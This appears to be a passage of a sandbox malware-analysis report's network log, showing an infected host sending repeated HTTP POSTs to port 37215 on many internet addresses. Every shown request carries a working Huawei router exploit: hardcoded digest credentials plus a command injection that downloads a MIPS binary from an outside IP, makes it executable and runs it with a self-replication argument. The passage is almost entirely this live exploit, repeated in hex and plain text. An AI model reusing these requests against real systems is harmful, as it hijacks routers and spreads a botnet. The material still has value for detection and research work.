                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1531192.168.2.2360576157.118.158.25437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546556950 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1532192.168.2.2359996157.96.206.17537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546581030 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1533192.168.2.2350496157.209.188.14537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546652079 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1534192.168.2.235241871.39.127.837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546663046 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1535192.168.2.235104041.52.234.10537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546708107 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1536192.168.2.235061841.97.57.8337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546744108 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1537192.168.2.234085841.1.241.17837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546751022 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1538192.168.2.235430841.209.208.9237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546744108 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1539192.168.2.2341820197.126.23.11837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546768904 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1540192.168.2.233453653.129.212.1237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.546768904 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
